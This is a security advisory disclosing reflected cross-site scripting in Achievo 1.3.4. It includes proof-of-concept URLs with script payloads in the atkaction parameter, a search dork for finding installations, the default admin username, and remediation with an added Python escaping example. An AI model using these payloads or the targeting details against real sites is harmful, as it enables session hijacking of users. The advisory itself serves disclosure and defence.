Achievo - Cross Site Scripting Vulnerability
Version Affected: 1.3.4 (August 12, 2008) (newest)
Info: Achievo is a flexible web-based resource management tool for business environments.
Achievo's resource management capabilities enable organisations to support their business processes in a simple but
effective manner.
It is a solution that fits seamlessly to the wishes of every organisation and offers the possibility and freedom to adapt
the functionality to the needs of the organisation. It will fit into every organisation because Achievo is extremely easy
to adapt to your specific situation.
Opinion: Achievo seems to know what they're doing, or perhaps it's just because 99% of the platform is locked down.
Credits: webDEViL (for inspiring me) and all of InterN0T :-)
Googled0rk: (we were unable to produce an accurate d0rk)
inurl:/achievo/index.php intitle:achievo
However, why would One need a Googled0rk when One can just look here?
http://www.achievo.org/product/testimonials/
External Links:
http://www.achievo.org/
http://www.achievo.org/download/
http://www.achievo.org/demo/
Default Admin User:
administrator
-:: The Advisory ::-
Version Information:
http://www.website.tld/achievo/doc/CHANGES
Vulnerable Function / ID Calls: (XSS)
atkaction (this has to be used in conjunction with another main function call!)
Cross Site Scripting:
http://www.website.tld/achievo/index.php?"><script>alert(0)</script><br
Explained: The above has minimal impact, as it is almost impossible, if not impossible, to abuse. This works only when One
is NOT logged in.
http://www.website.tld/achievo/dispatch.php?atknodetype=pim.pim&atkaction=<script>alert(document.cookie)</script>
Explained: The above has greater impact, as it will survive a login. This parameter is not filtered either. This works only
when One IS logged in.
Additional Information:
If $config_session_regenerate = false; in config.inc.php is set to true, then the session ID will be regenerated on each
hit/click, which prevents session hijacking.
-:: Solution ::-
The easiest solution is to validate user input and strip or convert bad / HTML characters. Setting the above option to
true might solve the issue partially; however, session hijacking is only one of the things that can be done with cross
site scripting.
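The solution above, as an added example that is not Achievo's own code: the two request URLs from the advisory are rendered through a hypothetical template (the request URL reflected into an attribute, atkaction reflected into page text; both sinks are assumptions) once unencoded and once with every reflected value converted, and a real HTML tokenizer checks whether a script element results.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed request URLs, copied from the two cases in the advisory above.
INDEX_URL = 'http://www.website.tld/achievo/index.php?"><script>alert(0)</script><br'
DISPATCH_URL = ("http://www.website.tld/achievo/dispatch.php"
                "?atknodetype=pim.pim&atkaction=<script>alert(document.cookie)</script>")


def _atkaction(url: str) -> str:
    """Pull the atkaction parameter out of a request URL ('' when absent)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("atkaction", [""])[0]


def render_vulnerable(url: str) -> str:
    # Hypothetical template standing in for the real Achievo pages: the request
    # URL lands in an attribute (which is why the '">' break-out works against
    # index.php) and atkaction lands in page text (the dispatch.php case).
    # Nothing is encoded, so both values are interpreted as markup.
    return (f'<form action="{url}">'
            f"<p>Unknown action: {_atkaction(url)}</p></form>")


def render_hardened(url: str) -> str:
    # Same template, but every reflected value is converted with html.escape.
    # quote=True also converts the double quote, the character that closes the attribute.
    return (f'<form action="{html.escape(url, quote=True)}">'
            f"<p>Unknown action: {html.escape(_atkaction(url), quote=True)}</p></form>")


class _TagCollector(HTMLParser):
    """Records start tags so the check uses a real HTML tokenizer, not a substring match."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def has_script_element(fragment: str) -> bool:
    """True when the fragment makes the parser create a <script> element."""
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return "script" in parser.tags
```

Converting (escaping) is preferable to stripping because the original value is preserved for display while still being inert; the check passes for both advisory payloads only in the hardened renderer.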
Conclusion:
Achievo generally seems like a secure system, with the exception of the above. This advisory didn't contain that much, but
it still covers one very minor and one minor hole. Basically, the success of exploitation relies entirely on the
administrator or user the attack is executed against.
Disclosure Information:
All of the best,
MaXe